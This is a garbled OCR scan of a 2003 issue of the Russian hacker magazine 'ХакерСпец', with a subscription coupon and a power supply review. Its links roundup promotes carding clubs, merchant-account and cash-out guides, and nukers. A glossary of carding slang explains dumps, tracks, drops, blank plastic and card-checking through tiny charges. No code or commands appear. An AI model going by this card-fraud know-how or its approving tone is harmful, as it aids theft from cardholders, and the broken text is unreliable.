КТО ПРЕДУПРЕЖДЕН - TOT ВООРУЖЕН | 


Раздел статей охватывает вопросы атак 
на скрипты, р—р-баги и многое другое. Ha 
форуме сайта обитают монстры компью- 
терных технологий, которые наверняка 
смогут ответить на твои вопросы. 


Также стоит обратить внимание на сайт 
www.eboard.ru, Ha нем представлена ин- 
формация по безопасности и взлому в 
Сети. Есть интересные программки для 
тестирования защищенности систем и 
многое другое, что сможет пригодиться 
при ведении бизнеса в Сети. Кроме то- 
го, есть часто посещаемый ‹рорум, где 
ты тоже сможешь найти gna себя что- 
нибудь вкусненькое. 


ОНЛАЙН-БАНКИНГ (HTTP://EFF 
NANCE.REPORT.RU) 
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Полезная инфра по интернет- 

банкингу и использованию он- 
лайн-платежей. Описаны история за- 
рождения и развитие российского он- 
лайн-банкинга, имеется информация 
по современным банковским элект- 
ронным технологиям. 


Также весьма интересен журнал Online 
Banking (www.onlinebankingreport.com), 
где можно почерпнуть последние миро- 
вые новости и найти полезные ссылки 
на веб-банки. 

По адресу http://ficus.vzfei.barnaul.ru/lec- 
tion8_2.htm представлена интересная лек- 
ция, в которой рассмотрены вопросы 
безопасности банковских систем, опи- 


саны программно-технические средства 
защиты. 


КЛЮЧ КО ВСЕМ ВРАТАМ 
(HTTP://WINSIUS.DAX.RU/KARD- 
ING.HTM) 


На этом сайте собрана велико- 

лепная подборка инструментов 
профессионального взломщика. 
Здесь ты найдешь огромное количест- 
во документации и программ по "тес- 
тированию" мыла, аськи, портов 
компьютера, карточек. Можно попро- 
бовать компьютер на прочность (свой 
или друга) с помощью множества ню- 
керов. 


ИНТЕРНЕТ-АУКЦИОНЫ 
(WWW.EBAY.COM) 


На интернет-аукционах ты смо- 

жешь достать самую нужную 
вещь на свете за совсем небольшие 
деньги. Ну, и продать ее потом :). Аук- 
цион Ebay - самый известный и попу- 
лярный в мире. На нем сможешь найти 
и достать практически все, а если под- 
напрячься - еще и заработать. 


Если тебе в NOM сидеть с англо-рус- 
ским переводчиком, загляни по адресу 
www.ebay-online.ru, там найдешь инфу 
про популярный аукцион на русском и 
даже регистрационную срорму. Ну, а 
для начала можешь потренироваться 
на кошках - думаю, отечественный мо- 
лоток (www.molotok.ru) как раз для 
этого подойдет. 

Если хочешь побольше узнать про ин- 
тернет-аукционы, посети 
www.kirills.com/service/online_auction.html. 
Здесь довольно подробно рассказано 
про интернет-аукционы, описаны их 
виды, даны несколько классисрикаций, 
есть правила аукционов, представле- 
ны примеры. 
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Здесь ты сможешь окунуться в 

реальную жизнь настоящего 
Kapgepa, полную опасностей и прик- 
лючений. Кроме того, сможешь приоб- 
рести реальные веши, столь необхо- 
димые в работе кардера. Если же ты 
сможешь вступить в сам клуб (для 
этого тебе придется попотеть), то бу- 
дешь вообще в шоколаде. А после 
всего этого советую на досуге почи- 
тать Уголовный кодекс Российской 
Федерации, чтобы до конца осознать, 
насколько это серьезно. 


0 МЕРЧАНТ АККАУНТАХ 
(WWW.KEMFORD.RU/INDEX.PHP32P 
AGE=MERCHANT_FAQ) 


Если ты всерьез решил занять- 

ся кардингом, тебе будет инте- 
ресно узнать о мерчант аккаунтах - 
что собой представляют и как их полу- 
чить. На представленном ресурсе име- 
ется весьма неплохой ГАО по ним. 
Кроме того, тут же ты сможешь под- 
робно узнать, что необходимо для ре- 
гистрации предприятия в Штатах (а 
кардеру это иногда необходимо), а так- 
же почерпнуть другую UHCpy об элект- 
ронном бизнесе. 


Весьма интересна статья по адресу 
www.hack-line.ru/forum/viewtopic.php?t=28, в 
которой хорошо и без купюр расска- 
зывается о мерчантах. Также советую 
просмотреть другие темы этого фору- 
ма. Здесь ты найдешь весьма познава- 
тельную статью про обнал и сможешь 
пообщаться на тему кардинга. 


ХАЛЯВНЫЙ ИНТЕРНЕТ 
(WWW.GAMEROI.NAROD.RU/XALAVA 
PAGE.HTM) 


Для того чтобы просмотреть все 

выложенные линки, потребуется 
много времени. В качестве компенса- 
ции предлагаю ознакомиться с этим 
ресурсом. На нем ты узнаешь, как 
можно достать халявный интернет и 
насколько это законно :). 


ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 11 НОМЕРОВ 
ПОЛУГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 5 НОМЕРОВ 


ЦЕНЫ ДЕЙСТВИТЕЛЬНЫ ПРИ ОПЛАТЕ ПО ДАННОМУ КУПОНУ ДО 30 НОЯБРЯ 


редакционная 
ПОДПИСКА! 


Вы можете оформить редакционную подписку на любой российский адрес 


Для этого необходимо: 
1. Заполнить подписной купон (или 
его ксерокопию). 


2. Заполнить квитанцию (или 
ксерокопию). Стоимость подписки 
заполняется из расчета: 


6 месяцев - 690 р. —> р» 
12 месяцев - 1380 р. _  1265р.. 


(В стоимость подписки включена 
доставка заказной бандеролью.) 


3. Перечислить стоимость подписки 
через Сбербанк. 


4. Обязательно прислать в редакцию 
копию оплаченной квитанции с четко 
заполненным купоном 

или по электронной почте 
subscribe_xs@gameland.ru 

или no факсу 924-9694 
(с пометкой "редакционная 
подписка"). 

или по адресу: 

103031, Москва, Дмитровский 
переулок, д 4, строение 2, 
ООО "Гейм Лэнд" (с пометкой 
"Редакционная подписка"). 


Рекомендуем использовать 
электронную почту или факс. 


ЦЕНЫ ДЕЙСТВИТЕЛЬНЫ ПРИ 
ОПЛАТЕ ПО ДАННОМУ 


КУПОНУ ДО 30 НОЯБРЯ 


Подписка для юридических лиц 
Юридическим лицам для оформления 
подписки необходимо прислать заявку 
на получение счета для оплаты по 
адресу subscribe_xs@gameland.ru или 
по факсу 924-9694 (с пометкой 
"редакционная подписка"). В заявке 
указать полные банковские реквизиты и 
адрес получателя. Подписка оформля- 
ется на 12 месяцев, начиная с месяца, 
следующего после оплаты. 


ПОДПИСНОЙ КУПОН (подписка через редакцию) 
Прошу оформить подписку на журнал "ХакерСпец" 


С на первое полугодие 2004 г 
Сна 2004 год 


(отметьте квадрат, выбранного варианта подписки) 


Ф.И.О. 


Город/село 


Дом корп. 


Сумма оплаты 


Подпись Дата 


Копия платежного поручения прилагается. 


ИНН 7729410015 ООО"ГеймЛэнд" 
Извещение ЗАО — Международный Московский Банк ‚ г. Москва 


р/с №40702810700010298407 
к/с №30101810300000000545 
БИК 044525545 КПП - 772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала "ХакерСпец" 


С на первое полугодие 2004 г. 
Сна 2004 год 


Сумма 


Подпись плательщика 
Кассир 2 7 


UHH 7729410015 ООО"ГеймЛэнд" 


ЗАО — Международный Московский Банк ‚ г. Москва 

р/с №40702810700010298407 

к/с №30101810300000000545 

БИК 044525545 КПП - 772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 

Оплата журнала "ХакерСпец" 

О на первое полугодие 2004 г. 
Сна 2004 год 


Сумма 


Квитанция 


Подпись плательщика 
Кассир 


(GIN SPEcial delivery | ГЛОССАРИЙ КАРДЕРСКИХ ТЕРМИНОВ \ 


GLAZb 


ГЛОССАРИЙ 


$9285 


аки в любой более-менее обособленной культуре, у кардеров существует свой жаргон. Надеюсь, тебе никогда не 
придется общаться с ними на профессиональные темы ;), но тем не менее - эта статья поможет понять смысл 
написанного в этом номере. 


РАЗБИРАЕМСЯ С ТЕРМИНОЛОГИЕЙ 


. 


р 


формация о них. Напри- 
мер, муха - это номер кар- 
ты плюс CVV код, имя 
Kapgxongepa, дата оконча- 
ния действия карты, адрес 
Kapgxongepa (страна, го- 
род, индекс, улица, дом, 
телефон, е-тай). Для не- 
которых серьезных опера- 
ций может потребоваться 
SSN американца, дата 
рождения, девичья фами- 
лия матери. 


Фрауд (fraud) - неза- 

конная операция. Со 
всеми вытекающими отсю- 
да последствиями. 


Kapgxongep (card- 

holder) - владелец 
карты. Именно он (а не ты 
:)) имеет право использо- 
вать карту как платежный 
инструмент и получать 
деньги в банкоматах. 


ХАКЕРСПЕЦ | 11(36) | 2003 


CVV/CVV2/CVN код 

- три-четыре цифры, 
улучшающие защиту карт 
при оплате через интернет. 
Теперь карты без этого ко- 
да практически нигде не 
принимаются. 


Чекать карты (про- 

верять на валид- 
ность) - проверка кредит- 
ных карт на работоспособ- 
ность. Кредой могли вос- 
пользоваться до тебя, из- 
за чего Kapgxongep мог ее 
заблокировать и, следова- 
тельно, сделать по ней уже 
ничего нельзя. Поэтому 
креды стоит брать у прове- 
ренных продавцов или где- 
то проверять. Проверка 
обычно заключается в Cbe- 
ме с карты минимально 
возможной суммы (около 
10 центов). Если снять уда- 
лось, значит, креда рабо- 
чая, и ее надо срочно куда- 
нибудь вбивать. Проверять 
лучше через спецпрограм- 
мы или в специальных мес- 
тах. На порносайтах чекать 
не советую, так как именно 
там они и убиваются. 


Вбивальщик - чело- 

век, который знает, 
как правильно купить то- 
вар в е-магазине или акка- 
унт на порносайте, так что- 
бы при этом не появилось 
сообщение transaction 
declined. 


де. Обычно это бытовая 
техника, так как потом ее 
можно продать. А прода- 
вать надо, потому что, во- 
первых, ее очень сложно 
ввезти в Россию, а во-вто- 
рых - никому не нужны 90- 
ма вещественные доказа- 
тельства. Продажей может 
заниматься, например, 
иностранный дроп. 


Дроп (от англ. drop - 

бросать) - человек, на 
которого "скидываются" на- 
личные, чеки или товары, за- 
казанные в магазине, кото- 
рые он потом передает свое- 
му нанимателю. Дроп может 
ине знать, что приобретено 
все не совсем честным спосо- 
бом. Или наоборот, занимать- 
ся этим профессионально. 


Вайер (wire trans- 
fer) - банковский пе- 
ревод. Идет долго, но Ha- 


СС, картон, == = = = Вещевой кардинг - дежно. Весьма вероятен и 
ы i a 

картофель, [МА Se | одна из разновид- чарджбэк, если деньги кра- 

мухи - кре- ностей кардинга, заключа- деные. 

дитные кар- ется в покупке реальных 

ты или ин- вещей по украденной кре- Чарджбэк (топеу 


Баск) - отзыв денег. 
Делают интернет-магази- 
ны, банки, электронные 
системы платежей. Произ- 
водится, когда жертва кар- 
динга заявляет, что ее 
обокрали. Поэтому в кар- 
динге большое значение 
придается OTMbIBY и обна- 
личке денег. 


Money orders или 

Cashier Checks - че- 
ки, которые заранее опла- 
чены. Из всех видов чеков 
эти - самые удобные для 
кардеров. С остальными 
приходится долго возиться: 
посылать их на проверку в 
другой банк и заполнять 
кучу бумаг. А эти чеки не 
требуют такого напряже- 
ния, правда и комиссион- 
ный процент у них очень 
неслабый. 


Транзакция - опера- 

ция по карте, начина- 
ющаяся с идентификации 
Kapgxongepa и до момента 
выдачи денег. 


Палка - PayPal, систе- 

ма электронных пла- 
тежей (типа наших 
WebMoney). Существенное 
отличие в том, что туда 
можно переводить деньги с 


креды. Правда, делать это 
становится все труднее и 
труднее - организуются ли- 
миты ввода, лимиты выво- 
да иеще много разных ог- 
раничений. 


Нальщик - человек, 

который помогает пе- 
ревести деньги в налич- 
ность. Допустим, к тебе 
пришел чек. Отдаешь его 
нальщику - получаешь на- 
личность. Нальщики не на- 
NAT креды! В основном они 
работают с чеками, банко- 
вскими вайерами, денеж- 
ными переводами. 


Эскроу-сервисы 

(escrow services) - 
конторы, которые играют 
роль гарантов при работе с 
аукционами. Ты им отсыла- 
ешь деньги, ЭС сообщает 
продавцу, что деньги есть, 
и OH (продавец) отсылает 
товар. Получив его, ты со- 
общаешь об этом, и деньги 
уходят продавцу. 


Белый пластик - это 

не пластик от элит- 
ных производителей, как 
мне однажды заявил "гуру" 
кардинга, а просто белый 
кусок пластика (обычно 
марки CR-80) с пустой маг- 
нитной полосой. Похож на 
СО-болванку, и на него то- 


же можно записать много 
интересного ;). 


Дамп - информация, 

записанная на маг- 
нитной полосе кредитной 
карты. Обычно состоит из 2 
или 3 треков. 


Трек (дорожка) - ку- 

сок информации, за- 
писанный на карте. Всего 
на карте их 3. Первый - ин- 
фа о владельце, второй - 
инора о владельце, о банке 
и др., третий - запасной или 
для дополнительной ин- 
сформации. Самый важный - 
это второй трек. Третий нам 
не интересен, так как ниче- 
го ценного собой не предс- 
тавляет. 


Эмитент пластико- 

вой карты (card 
issuer) - контора, которая 
выдала карту. Это может 
быть банк, магазин (диско- 
нтная карта) и др. Мы бу- 
дем говорить о банковских 
кредитных картах, поэтому 
в качестве эмитентов бу- 
дем рассматривать банки. 


BIN (Bank 

Identification 
Number) - первые несколь- 
ко цифр номера карты, ко- 
торые указывают на банк- 
эмитент. Обычно это пер- 
вые шесть цифр. Если банк 
очень крупный, достаточно 
и первых трех цифр. 


Банк-эквайер 

(acquirer) - банк, от- 
вечающий за первичную 
обработку тразакций. То 
есть, сначала он работает с 
твоей кредиткой, магазина- 
ми, в которых ты отовари- 
ваешься, банкоматами, в 
которых ты получаешь 
деньги. Именно он распро- 
страняет стоп-писты. 


Авторизация - про- 

цесс проверки нали- 
чия средств на счете у кли- 
ента. 


Мерчант аккаунт 

(merchant account) - 
специальный счет в банке, 
который открывается про- 
давцом, чтобы снимать 
деньги с карт-счетов. Нап- 
ример, решил ты принимать 
оплату кредитными карта- 
ми. В банке открываешь та- 
кой счет, и на него поступа- 
ют деньги от покупателей. 
Чтобы тебе не ждать, пока 
перейдут деньги с карт-сче- 
та, банк платит тебе из сво- 
его кармана, а сам ждет тех 
денег. Поэтому, чтобы отк- 
рыть такой счет, нужно 
просто излучать уверен- 
ность, что твой ларек завт- 
ра не обанкротится. 


Эмбоссер - аппарат, 
который выдавливает 
инору на картах. Обращал 


внимание, что на кредитках 
буквы не нарисованы, а как 
бы выдавлены? Этим и за- 
нимается эмбоссер. 


Вот такой ридер стоит $1300 


Энкодер (ридер) - 

девайс для чтения и 
записи инфы с магнитной 
полосы кредитки. 


ATM (Automatic 
Teller Machine) - бан- 
комат. 


Импринтер - устрой- 

ство, которое печата- 
ет на слипе данные, эмбос- 
сированные на карте, и 
данные о точке, на которой 
расположен импринтер. 


ПОС-терминал 

(point-of-sale termi- 
nal) - устройство, установ- 
ленное в магазинах. Считы- 
вает инору, записанную Ha 
магнитной полосе, и связы- 
вается с банком для прове- 
дения транзакции. В отли- 
чие от банкомата, ПОС-тер- 
минал управляется касси- 
ром. В большинстве случа- 
ев идентификация покупа- 
теля является визуальной, 
то есть кассир не спрашива- 
ет пин-код или удостовере- 
ние личности. Это не касает- 
ся нескольких видов карт, 
требующих полной автори- 
зации и идентификации при 
использовании. 


_Правильно запитай 
свой комп 


Останкино в кузове 


HARD 


ПРАВИЛЬНО ЗАПИТАЙ СВОЙ комп | 


test_lab (test_lab@gameland.ru) 


ПРАВИЛЬНО 
ЗАПИТАЙ 
свой KOMN 


ЧТО МЫ ТЕСТИРУЕМ 
И ЗАЧЕМ? 

Что надо для полного 
счастья кул-хацкеру? Речь 
идет не о супер-пупер крутом 
cocpTe для ломки, и не о мегапримочках gna 
твика-сфрика. Сосфт и периферия - geno 
третье после самого главного, без чего все 
это безобразие никому не нужно. Если про- 
цессор + память = мозг, то желудком твоего 
компьютера можно назвать его блок пита- 
ния. Именно от стабильных характеристик, 
надежности и безотказности питала зависит 
стабильная работа всего на него навешенно- 
го, нагруженного и приаттаченного. А спо- 
койный сон кул-хацкера и его герл-хацкера 
зачастую зависит от бесшумности работы 
всей системы в целом, в том числе и этого са- 
мого блока питания aka БП aka Power Supply. 


Сегодня мы будем мучить девять подопыт- 
ных блоков питания. Отобрали мы их по двум 
критериям: тип - ATX, питание - gna Pentium 4 
(хотя и старые типы АТХ-плат тоже поддер- 
живаются). Небольшой ликбез: основное от- 
личие питания плат для P4 - необходимость, 
помимо стандартной 20-штырьковой подвод- 
ки питания стандарта АТХ, в двух дополни- 
тельных подводках от блока питания. Это 
«квадратный» 4-Pin ATX12V и «половина АТ- 
разъема» 6-pin AUXPWR. Хотя в последнее 
время 4-Pin АТХ12\ можно встретить и на 
АМО-матери. Кстати, об обозначениях двух 
других разъемов питания дисковых накопи- 
телей и прочих внутренних устройств. Оба 
они являются стандартными со времен 
РС/ХТ для всех IBM РС-совместимых машин. 
Для справки, были еще и IBM Р5/2-совмести- 
мые машины, у которых была шина МСА - 
Microchannel Architecture, а питание к нако- 


пителям подводилось через четыре жилы 
сигнального шлейсра - так же, как и у нако- 
пителей в портативных компьютерах. Нас 
интересует стандартный 4-штырьковый 
разъем питания пятидюймовых устройств 
жестких дисков трех- и пятидюймового срор- 
мата и прочих устройств (стримеров, венти- 
ляторов на 12 вольт, внешних панелей ауди- 
осистем и т.п.). Кстати, современные мощные 
видеокарты и даже некоторые аудиокарты 
требуют внешней подпитки от четырехш- 
тырькового разъема. 

Есть и меньший по габаритам брат - разъем 
для подключения внутренних устройств, пре- 
имущественно трехдюймового формата (дис- 
ководы сфлоппи-дисков, магнитооптики, ZIP, 
JAZZ, LS-100, некоторые стримеры и пр.). Со- 
ответственно, назовем их для удобства HDD 
и FDD разъемами. 


КАК ЗАКАЛЯЛАСЬ СТАЛЬ 

Точнее, как тестировалось железо. 
Ф. Тест на беременность... то есть Ha допус- 
тимую нагрузку. Брался реостат и ставился 
между землей и небом... Tbqpy... Землей и пи- 
танием (+12 и +5 В). При этом последователь- 
но прикручивался амперметр, а параллельно 
- вольтметр. Варьировалось сопротивление 
gO достижения максимально заявленного 
или максимально достигнутого (как у двух 
Powerman'oB) тока. При этом оба блока прос- 
то отключались до повторного нажатия 
PowerSw (GreenPWR). Полученные крайние 
значения напряжений и занесены в таблицу. 
@. Тест на уровень шума. Взяли микрофон, 
одноканальный фиксированный усилитель и 
UV-meTp (тот, что показывает децибелы). Все 
это было спаяно и оттарировано по показани- 
ям UV-MeTpa музыкального центра Kenwood. 
Но так как это не истина в последней инстан- 
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ции, то будем писать значения в ус- 
ловных единицах (для наглядного 
сравнения). 

@. Тест на уровень вибраций. Взяли 
пьезадатчик и милливольтметр. Испы- 
туемый помещался на этот самый дат- 
чик, лежащий на твердой поверхнос- 
ти (чугунной плите, которую от пола 
лаборатории отделял слой микропо- 
ристой резины аля виброизоляции). С 
датчика снимались показания go 
включения и во время работы БП. 
Разность значений являлась доволь- 
но точным критерием сравнительной 
оценки энергий колебаний вентилято- 
ров блоков питания. Но в каких egu- 
ницах считать (go Джоулей здесь да- 
леко, а милливольты - только показа- 
тель для сравнения, а отнюдь не оп- 
ределения энергии виброколебаний)? 


Единственное, что утешает - ни один 
подопытный кролик (собственно, как 
и ни одно кул-хацкероподобное суще- 
ство) в этой печальной истории не 
пострадал. Best regards! Почитать о 
БИ можно здесь: www.ixbt.com/periph- 
eral/psu-cases-faq.shtml. 


КАК ВКЛЮЧИТЬ 

БЛОК ПИТАНИЯ АТХ 

БЕЗ МАТЕРИНСКОЙ ПЛАТЫ? 
Замкнуть черный провод (масса) 

на зеленый (PowerOn) в 20-штырько- 

вом разъеме питания ATX. Но gna то- 

го, чтобы БП не сгорел без нагрузки, 

необходимо повесить какое-пибо уст- 

ройство (например, жесткий диск) на 

А-штырьковую колодку питания. 


КАК ЛУЧШЕ ПОДКЛЮЧИТЬ 
МОНИТОР: К РАЗЪЕМУ БП 
ИЛИ ПРЯМО В РОЗЕТКУ? 
Разницы нет. Монитор никак не 
скажется на работе БП в любом из 
этих случаев. Правда, в хорошем бло- 
ке питания, между контактами сети 
(«папа») и монитора («мама») уста- 
навливают сфильтр с ограничителями 
бросков напряжения, так что такое 
подключение монитора «здоровее». 
Впрочем, опять-таки, только при хоро- 
шем БП :). 
Также в случае подключения монито- 
рак АТ БИ, ты дополнительно получа- 
ешь возможность выключить оба уст- 
ройства (компьютер и монитор) одной 
клавишей (в случае с АТХ БП это уже 
не действует). 


НУЖНА ЛИ КНОПКА 
ВЫКЛЮЧЕНИЯ ПИТАНИЯ 
НА БП АТХ? 

Иногда бывает довольно удобно, 
для полного обесточивания матери- 
нской платы, применять этот выклю- 
чатель. Не приходится выдергивать 
шнур из розетки. Ну а если выключа- 
теля нет — ничего страшного. Глав- 
ное, оставляя компьютер на длитель- 
ное время, например, отправляясь в 
отпуск, не забудь отключить его про- 
вода питания от ИБП или от розетки 
— известны случаи самопроизвольно- 
го включения компьютера с «левым» 
БП при резких скачках питающего 
напряжения. 


КАК ПРОВЕРИТЬ 
СТАБИЛЬНОСТЬ НАПРЯЖЕНИЯ, 
ВЫДАВАЕМОГО БП? 

Необходимо нагрузить БП (напри- 
мер, лампами для автомобильных 
cpap, или блоками достаточно мощных 
резисторов) и померить напряжения 
тестером. Если напряжения в преде- 
лах нормы, а стрелка особо не скачет, 
то все должно быть нормально. Мож- 
но еще проверить пульсации осцил- 
лографром, если есть такая возмож- 
НОСТЬ. Также стоит проверить измене- 


ние выдаваемого БП напряжения с 
изменением нагрузки и по прошест- 
вии времени. В принципе, можно это 
делать с помощью функции систем- 
ного мониторинга напряжений твоей 
платы, если он присутствует, и если 
ты склонен доверять тому, что он пи- 
шет. В этом случае лучше запустить 
какой-нибудь «crush test», нагружаю- 
щий все без исключения устройства 
компьютера. 


НА ЧТО ОБРАТИТЬ ВНИМАНИЕ 
ПРИ ПОКУПКЕ БП? 

Качество изготовления, в том чис- 
ле толщину металла, из которого сде- 
лан корпус БП, наличие ребер жест- 
кости, качество клепки деталей и их 
окраску. Не соблазняйся на блеск по- 
лумиллиметрового оцинкованного 
железа. 

Наличие различных наклеек, гово- 
рящих о соответствии тем или иным 
стандартам. Хотя это зачастую не по- 
казатель, в общем-то... 

Известность марки (не путать с 
известностью логотипа на наклейке!). 

Количество выходных разъемов. 
Чем больше - тем лучше. 

Посмотреть на размер радиато- 
ров, количество нераспаянных компо- 
нентов. Вскрытие БП go покупки 
обычно невозможно, так что придется 
высматривать все через щели. 

При возможности проверить ста- 
бильность выдаваемого напряжения, 
как было описано выше. 

Наличие выключателя питания на 
задней стенке. Тоже признак. 

Наличие переключателя напряже- 
ния. Китайские производители обыч- 
но его вообще не ставят. Хотя... спра- 
ведливости ради — лучшие современ- 
ные блоки питания все равно по про- 
исхождению китайские или тайваньс- 
кие. Не веришь — спроси у брендов. 

Максимальные токи, указанные на 
наклейке сбоку БП. Чем больше - тем 
лучше. 

Желательна поддержка стандарта 
АТХ 2.03, т.е. «полная готовность к 
Pentium 4». 

Мощность. Лучше всего 300 Вти 
больше. 

Цена. Ну не может хороший АТХ 
БП стоить 400 рублей ;). » 


test_lab выражает благодарность 
компаниям Олди (www.oldi.ru) т. 105-07-00 
и USN (www.usn.ru) т. 775-82-02 3a 
предоставленное оборудование 
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(X59 HARD | ПРАВИЛЬНО ЗАПИТАЙ СВОЙ КОМП | 


POWERMAN PRO 
HPC-360-102 DF 


INWIN/POWERMAN 
IW-P300A2-0 


Мощность: 360 BT 

HDD: 6 

FDD: 2 

ШУМ: 57 

ВИБРАЦИИ: 57,5 

СЕТЬ: 115/230 (ручной, заклеенный) 
Мониторный разъем: нет 


Этот блок питания является 

точной копией первого, 
представленного в нашем тесте 
производителем Thermaltake. Име- 
ются 2 вентилятора на подшипни- 
ках качения, контроль скорости 
вращения, развитые радиаторы. 

Отличает же его только "забот- 

ливо" заклеенный стикером "АС 
VOLTAGE 200-240V" переключа- 
тель питания 110/220 В. В осталь- 
ном точная копия, в том числе и по 
характеристикам. 


Мощность: 300 Вт 


ВИБРАЦИИ: 52,2 
СЕТЬ: 15/230 (ручной) 
Мониторный разъем: нет 


Пятый образец является 

обычным блоком питания, по- 
хожим на Codegen 300XX, но отли- 
чающимся "малошумной" штампо- 
ванной выходной решеткой с немно- 
го меньшим проходным сечением и 
большим сечением боковых реше- 
ток. Также в нем отсутствует выход 
питания для монитора, зато у него 
самое большое количество четыре- 
хштырьковых разъемов для диско- 
вых накопителей (7 HDD + 2 FDD). 


POWER MASTER 
FA-5-1 


HDD: 4 

FDD: 2 

ВИБРАЦИИ: 54,7 

СЕТЬ: 115/230 (ручной) 
Мониторный разъем: нет 


Отличается от родственной 

модели только выходной 
мощностью, что указано в назва- 
нии. Так же, как и З50-ваттный, име- 
ет вентиляторы на подшипниках 
скольжения, которые, кстати, в хо- 
POLLIO смазанном состоянии должны 
шуметь меньше. 


Мощность: 300 Вт 
HDD: 4 

FDD: 1 

LUYM: 62 
ВИБРАЦИИ: 58,9 
СЕТЬ: фиксированный 
Мониторный разъем: нет 


Две модели, завершающие 

наш обзор, являются аналога- 
ми предыдущих блоков от LCT, нос 
некоторыми отличиями. К плюсам 
этих блоков питания можно отнести 
наличие малпошумной проволочной 
выходной решетки с большим про- 
ходным сечением, и более разветв- 
ленной входной решетки, специально 
спросрилированной gna обдува боль- 
ших радиаторов внутри блоков пита- 
ния. Еще одно отличие - это жестко 
фиксированное (без переключателя) 
входное напряжение 220 В. 


Мощность: 350 Вт 
HDD: 4 

FDD: 2 

ШУМ: 62 
ВИБРАЦИИ: 54,9 
СЕТЬ: 115/230 (ручной) 
Мониторный разъем: нет 


Обычный, не заслуживаю- 

щий особого внимания блок 
питания, с обычной штампован- 
ной выходной решеткой с повы- 
шенным проходным сечением и 
стандартной входной решеткой. 
Тот же привычный набор из пе- 
реключателя 110/220 В, выключа- 
теля питания 220 В и довольно 
скромного набора разъемов пита- 
ния дисковых накопителей. 


POWER MASTER FA-5-2 


Мощность: 250 Вт 

HDD: 4 

FDD: 1 

ШУМ: 61 

ВИБРАЦИИ: 61,1 

СЕТЬ: 230 (фиксированный) 
Мониторный разъем: нет 


Менее мощная модель 

Power Master FA-5-2 ничем 
не отличается от своего собрата. 
Те же подшипники скольжения и 
большие радиаторы. Кстати, боль- 
шая масса на радиаторах может 
спасти блок питания в критических 
условиях, если перегорит вентиля- 
тор либо перегреется корпус во 
время летней жары! 


TEAC COMBO DRIVE CD-RW/DVD 
DW-548D 


THERMALTAKE 
PUREPOWER W0003 


CODEGEN 


BUY 2003 


Мощность: 360 Вт 
HDD: 6 


FDD: 2 
ШУМ: 58 
ВИБРАЦИИ: 57,7 


СЕТЬ: 115/230 (ручной) 


Мониторный разъем: нет 


Общие впечатления. Итак, первое, что бросилось 

в Глаза - наличие двух вентиляторов на подшип- 
никах качения, один из которых (на нижней стенке) вса- 
сывает воздух из внутреннего пространства твоего компа 
в блок питания, а другой (на задней стенке) - выдувает 
воздух наружу. Плюсы, казалось бы, очевидны: должна 
быть лучше циркуляция воздуха и выше надежность за 
счет дублирования вентиляторов. А теперь - экспери- 
мент. Берем нечто, создающее тонкую струйку дыма (нап- 
ример, тлеющую соломинку или сигарету), а для лучшей 
видимости делаем все в темноте при свете ультрафиоле- 
товой лампы (из всего окружения лаборатории четко 
наблюдается ярко-синее свечение струйки дыма). Чтобы 
повторить этот зверский опыт, тебе придется запалить 
что-нибудь с достаточно стойким дымом. Например, дым 
от благовоний быстро рассеивается и ничего не видно. 
Ну и осторожнее с огнем, «при пожаре звони 01». 

И что же мы видим? Струйка дыма засасывается внут- 
ренним вентилятором и выходит наружу и... внутры Да, 
именно внутрь системного блока через развитую ре- 
шетку внутреннего забора (точнее, в данном случае - 
выпуска) воздуха. Итак, наличие второго вентилятора 
просто бесполезно (реально работает только один - вы- 
пускающий воздух), особенно учитывая повышение 
уровня шума блока питания и потребления тока. А при 
выходе из строя одного из них, эврорективность второго 
резко падает. Бонус здесь только один - при располо- 
жении внутреннего вентилятора блока питания напро- 
тив процессора, улучшается охлаждение последнего. 
Однако нам встречались более рациональные подходы, 
свойственные создателям брендов (IBM, Сотрад и т.п.), 
когда единственный вентилятор располагался напротив 
процессора и памяти. 
Теперь о других бонусах и минусах. Что есть что - pe- 
шать тебе. Конечно, внешне сделан блок симпатично - 
анодированные под золото решетки вентиляторов и 
винты корпуса, малошумные и высокоэдфофективные 
проволочные решетки взамен обычных штампованных 
с малым проходным сечением и высоким уровнем шума 
при прохождении воздуха. 

Безусловным плюсом является уже ставшее стандар- 
том наличие кнопки отключения блока питания от сети 
220 В. Также присутствует и ручной переключатель 
стандартов питания 10/220 В (точнее, 15/230 В) и про- 
вод датчика оборотов вентилятора блоков питания для 
подключения к материнской плате, что позволяет конт- 
ролировать скорость вращения внутреннего вентилято- 
ра. В остальном блок питания выполнен приятно, акку- 
ратно, работает стабильно. 


XN 


Мощность: 300 Вт 


Мощность: 400 Вт 
HDD: 4 
FDD: 1 
ШУМ: 52,9 
ВИБРАЦИИ: 51 
СЕТЬ: 115/230 (автоматический) 
Мониторный разъем: есть 


ВИБРАЦИИ: 51,2 
СЕТЬ: 15/230 (ручной) 
Мониторный разъем: нет 
Контроль скорости вращения, 
развитые радиаторы 


Третий образец порадовал 

своей продуманностью, прос- 
тотой и срункциональностью. Он ос- 
нащен штампованной выходной ре- 
шеткой с большим проходным сече- 
нием, кнопкой отключения блока 
питания от сети 220 В, наличием за- 
щищенного срильтром выхода пита- 
ния 220 В для подключения мони- 
тора и автоматическим переключа- 
телем 110/220 В. Несмотря Ha срав- 
нительно небольшое суммарное 
проходное сечение в корпусе, go- 
полнительные решетки расположе- 
ны оптимально, там, где им и поло- 
жено быть. Минусом этого блока пи- 
тания можно назвать малое количе- 
ство разъемов питания оля диско- 
вых накопителей и отсутствие воз- 
можности контроля оборотов вен- 
тилятора. 


Второй образец тестируемых 

блоков питания - младший 
брат первого и представляет собой 
обычный, добротно выполненный 
блок питания. От старшего брата 
его отличает наличие только OGHO- 
го вентилятора с подшипником 
скольжения, обычные хромирован- 
ные винты корпуса, обычная штам- 
пованная выходная решетка и на- 
личие достаточно развитой вход- 
ной решетки на месте внутреннего 
вентилятора первого блока пита- 
ния. Причем, эта решетка наполови- 
ну закрыта антистатической плен- 
кой. По параметрам от первого бло- 
ка питания его отличает мощность 
(300 Вт) и существенно более низ- 
кая шумность. Аналогично первому 
БП, на задней панели имеется кноп- 
ка отключения блока питания от се- \ 
ТИ 220 В, ручной переключатель 
стандартов питания 110/220 В и про- 
вод датчика оборотов вентилятора. 


В остальном блок питания является a f | 7 
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ВЫВОДЫ 
За 1000 рублей можно купить сносный БП, который прослужит тебе верой и 
правдой! Однако сильно экономить не стоит, поскольку блок питания во время 
